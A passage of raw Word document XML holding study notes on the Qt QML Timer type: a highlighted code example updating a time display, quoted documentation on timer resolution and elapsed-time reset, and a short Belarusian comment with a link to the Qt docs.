            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Timer</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F1022" w:rsidRPr="001F1022" w:rsidRDefault="001F1022" w:rsidP="001F1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F1022">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        interval</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>500</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> running</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> repeat</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F1022" w:rsidRPr="001F1022" w:rsidRDefault="001F1022" w:rsidP="001F1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F1022">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        onTriggered</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> time</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">text </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Date</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>().</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>toString</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F1022" w:rsidRPr="001F1022" w:rsidRDefault="001F1022" w:rsidP="001F1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F1022">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F1022" w:rsidRPr="001F1022" w:rsidRDefault="001F1022" w:rsidP="001F1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F1022" w:rsidRPr="001F1022" w:rsidRDefault="001F1022" w:rsidP="001F1022">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F1022">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:hyperlink r:id="rId1527" w:history="1">
        <w:r w:rsidRPr="001F1022">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Text</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> id</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> time </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F1022" w:rsidRPr="001F1022" w:rsidRDefault="001F1022" w:rsidP="001F1022">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F1022" w:rsidRPr="001F1022" w:rsidRDefault="001F1022" w:rsidP="001F1022">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The Timer type </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is synchronized with the animation timer</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Since the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A50E12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>animation timer is usually set to 60fp</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>resolution</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of Timer will be </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>at best 16ms</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F1022" w:rsidRPr="001F1022" w:rsidRDefault="001F1022" w:rsidP="001F1022">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If the Timer is running and o</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ne of its properties is changed, the elapsed time will be reset</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. For </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, if a Timer with interval of 1000ms has its</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>repeat</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property changed 500ms after starting, the elapsed time will be reset to 0, and the Timer will be triggered 1000ms later.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F1022" w:rsidRPr="001F1022" w:rsidRDefault="00BE3BBD" w:rsidP="00605F34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="001F1022">
        <w:rPr>
          <w:i/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>З таймерам атрымалася ўсё добра.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="00490E7E" w:rsidP="00E96ACF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1528" w:history="1">
        <w:r w:rsidR="008C71BA" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http</w:t>
        </w:r>
        <w:r w:rsidR="008C71BA" w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidR="008C71BA" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>doc</w:t>
        </w:r>
        <w:r w:rsidR="008C71BA" w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="008C71BA" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="008C71BA" w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="008C71BA" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>io</w:t>
        </w:r>
        <w:r w:rsidR="008C71BA" w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="008C71BA" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="008C71BA" w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-5/</w:t>
        </w:r>
        <w:r w:rsidR="008C71BA" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>qml</w:t>
        </w:r>
        <w:r w:rsidR="008C71BA" w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="008C71BA" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>qtqml</w:t>
